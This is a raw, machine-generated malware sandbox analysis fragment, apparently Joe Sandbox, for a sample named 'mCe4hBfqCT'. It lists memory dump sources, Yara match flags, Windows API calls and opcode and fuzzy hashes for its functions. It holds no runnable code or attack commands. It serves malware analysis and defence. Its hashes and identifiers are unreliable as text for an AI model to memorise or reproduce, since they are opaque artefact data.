                                                  • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                  • Instruction Fuzzy Hash: 864118B6502219AECB24DF79DC48EAB77FCEB81710F1486B9F905DB180E6729E418B50
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0304049A,?,00000004), ref: 0304549A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: 11@
                                                  • API String ID: 2299586839-1785270423
                                                  • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                  • Instruction ID: 028f3a563b7f5b2b9acc01a69e8e67d37c405dea8ff6997b555cd5dd31392538
                                                  • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                  • Instruction Fuzzy Hash: 8BF02B35681318BFDB01EF60DC01FAE7B61EF45B12F004165FD066B1A0DA718E20A699
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                  • Instruction ID: 4ac827831b60bfe85137482c2a27181e9cc595fbcc224352d04797812a560731
                                                  • Opcode Fuzzy Hash: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                  • Instruction Fuzzy Hash: 74024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AE819E7384D734AD41CB84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                  • Instruction ID: a894c32fc8e6d88c8dd95819ff8904c16c6d5ce7f2c2f1e4f43f0389589c8690
                                                  • Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                  • Instruction Fuzzy Hash: EA022D72E012199FDF14CFADD8806ADFBF5EF89314F198269D819E7244D731A941CB90
                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 03012648
                                                  • PostQuitMessage.USER32(00000000), ref: 030127EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageNtdllPostProc_QuitWindow
                                                  • String ID:
                                                  • API String ID: 4264772764-0
                                                  • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction ID: 7292fbf64b5154aa29caa2178fb78a30d98cf53bff50cc5ec3d1a5c2e23cd4e1
                                                  • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction Fuzzy Hash: 7B411E15A65384A4E730EFA5FC15B2637B4FF64762F14253BE528CB2B2E3A18550C70E
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction ID: 56894988d221dc275bbeb5d863802b50bab2a0c2ec5e1dae9116b4c396cbcd5f
                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction Fuzzy Hash: 58B15D3521060AAFD715CF28C48AB657BE0FF09364F26D659E899CF3A1C339D992CB44
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,03046F41,?,?,00000008,?,?,0304F402,00000000), ref: 03047173
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction ID: 85060cc67bcbee825137489af3ec5dea99ece715163d682a5a17ef96f04b4d7f
                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                  • Instruction Fuzzy Hash: 3DB14EB1511608DFD755CF2CC486B65BBE0FF45364F2986A8E8A9CF2A1C336DA91CB40
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2955987475-0
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 030421C0
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0304B920
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2955987475-0
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,03040A3C,?,0304BCA9,00000000,?,?,?), ref: 0304B5C6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_free
                                                  • String ID:
                                                  • API String ID: 787680540-0
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0304B89A,00000000,00000000,?), ref: 0304BB28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_free
                                                  • String ID:
                                                  • API String ID: 787680540-0
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 030421C0
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0304B920
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2955987475-0
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,00000006,?,03040A3C,?,0304BC6D,03040A3C,?,?,?,?,?,03040A3C,?,?), ref: 0304B63B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  APIs
                                                    • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  APIs
                                                    • Part of subcall function 0303E674: RtlEnterCriticalSection.NTDLL(02BC0DD4), ref: 0303E683
                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 0304508C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,00000006,?,?,0304BCCB,03040A3C,?,?,?,?,?,03040A3C,?,?,?), ref: 0304B540
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00410692,0301FE85), ref: 030208F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction ID: 80968e5e8bc017810328c9ff139e3a08396a4cd6bf5f0c598f5f88a651707172
                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction Fuzzy Hash: C691743230D0B34ADB29463DA53413FFFE15E523A139A079FE4F2CA2C5EE289954D624
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction ID: 81da1fb7956e68a5cad314f19e4679efa661c954a3e13c308610dbb1f4ed7180
                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction Fuzzy Hash: 2391567220A1A34ADBAD863E847407EFFE95A432A131D4BDDF4F2CB5C5EE24D1589620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction ID: 6d209accfb2b0f61ed35da4827d98296029fd821660f9634528c43e98a7d9207
                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction Fuzzy Hash: D491933230A0B34ADB69423D947403FFFE15A523A135A079FD4F2CA2C5EE189569E638
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction ID: 457a7431fe9f72efb553c6ec2e66170a55dca90e41c1b2b66686fac0675360e6
                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction Fuzzy Hash: 0A91217210A0A34EDBA9C63A857403EFFE95A431A131E4BDDF4F6CB5C5EE24D168D620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction ID: c950a799e81b9798c69e1fde7feb5263e7a66bddbd8f12dc999fd4da67e98d8e
                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction Fuzzy Hash: 02915F7230D0B34ADB29463EA47403EFFE15A523A539A079FD4F2CB2C1EE189665D624
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction ID: eab01ca7d0688043ec162e6e21c41ed66a2149628dd6ecd240d918be47113f24
                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction Fuzzy Hash: 4D9164B220B0A34EDBADC639857453EFFF95A439A131E0B9ED4F2CB1C5EE14C5549620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                  • Instruction ID: bf5b32470415164d0bde1c399ad2a9f6c2d5fa579297b3e458aa86cae917bf69
                                                  • Opcode Fuzzy Hash: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                  • Instruction Fuzzy Hash: 5F6132A1F0073866DB389A287895BBF23949F42748FE0051BE846DB3C1D69D9DC2C75E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                  • Instruction ID: 18f072b92bc2c8aab5cf26f04613ef0ba1b1ba6c588b56d10302d5094c0eb2d8
                                                  • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                  • Instruction Fuzzy Hash: 3561367561370967DB74DB2C8890BFFA3EEEF83604F0C085AD982DF2A0E615A942C355
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction ID: 70ade5293ce95a995033036da66bd690249c8a0141dd443be95812c5f6c87ab8
                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction Fuzzy Hash: 7381827230C0B34AEB29463E957843FFFE15A523A135A179FD4F2CA2C1EE18C694D624
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction ID: 616781a9f9b99fd5201fff2f4a6c546bd9e3d7a7f0a9f6d7c7215ffefb34657a
                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction Fuzzy Hash: 1F8146B220A0E349DBA9C63E857453EFFF95A439A131E0B9DD4F3CB5C1EE249154D620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 93e5daa5636be076332bd1d1c6ab8ee00e3655dcebceb5ec59e252ebbac9be67
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 69113B7730307153D6048A2DF8B45BF9795EBC53207ED426FD0418B749CE2AE9819508
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
